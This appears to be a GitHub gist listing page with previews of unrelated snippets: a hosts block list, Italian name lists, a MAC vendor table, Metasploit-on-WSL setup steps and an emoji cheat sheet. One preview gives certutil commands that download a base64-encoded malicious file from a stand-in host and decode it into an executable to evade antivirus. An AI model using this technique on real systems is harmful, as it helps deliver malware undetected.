https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png
![](https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png | width=100)
0.0.0.0 feedback.microsoft-hohm.com | |
0.0.0.0 search.msn.com | |
0.0.0.0 a.ads1.msn.com | |
0.0.0.0 a.ads2.msn.com | |
0.0.0.0 a.rad.msn.com | |
0.0.0.0 ac3.msn.com | |
0.0.0.0 ads.msn.com | |
0.0.0.0 ads1.msn.com | |
0.0.0.0 b.ads1.msn.com | |
0.0.0.0 b.rad.msn.com |
This post links my 3Box profile to my Github account! Web3 social profiles by 3Box. | |
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅ | |
Create your profile today to start building social connection and trust online at https://3Box.io/ |
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
1.) Enable Developer Mode | |
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
2.) Enable Windows Subsystem for Linux | |
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
3.) Reboot |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti | |
---------------- | |
abbondanza | |
abu | |
accadia |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti | |
---------------- | |
abaco | |
abbondanza | |
abbondanzia |
# script by JonnyBanana | |
#https://github.com/JonnyBanana | |
# this simple script asks to assign a name to a variable | |
#and then asks how many variables it must print on the monitor | |
# the output is like: | |
# a1 = '' | |
# a2 = '' | |
# a3 = '' | |
# a4 = '' | |
# a5 = '' |
000000 Officially Xerox | |
000001 SuperLAN-2U | |
000002 BBN (was internal usage only, no longer used) | |
000003 XEROX CORPORATION | |
000004 XEROX CORPORATION | |
000005 XEROX CORPORATION | |
000006 XEROX CORPORATION | |
000007 XEROX CORPORATION | |
000008 XEROX CORPORATION | |
000009 powerpipes? |
# certutil.exe bypass av on download + base64 Decoding | |
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
#into the executable. https://www.browserling.com/tools/file-to-base64 | |
#This is illustrated in Xavier Mertens handler diary. | |
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
C:\Temp>certutil.exe -decode bad.txt bad.exe |
People
:bowtie: |
😄 :smile: |
😆 :laughing: |
---|---|---|
😊 :blush: |
😃 :smiley: |
:relaxed: |
😏 :smirk: |
😍 :heart_eyes: |
😘 :kissing_heart: |
😚 :kissing_closed_eyes: |
😳 :flushed: |
😌 :relieved: |
😆 :satisfied: |
😁 :grin: |
😉 :wink: |
😜 :stuck_out_tongue_winking_eye: |
😝 :stuck_out_tongue_closed_eyes: |
😀 :grinning: |
😗 :kissing: |
😙 :kissing_smiling_eyes: |
😛 :stuck_out_tongue: |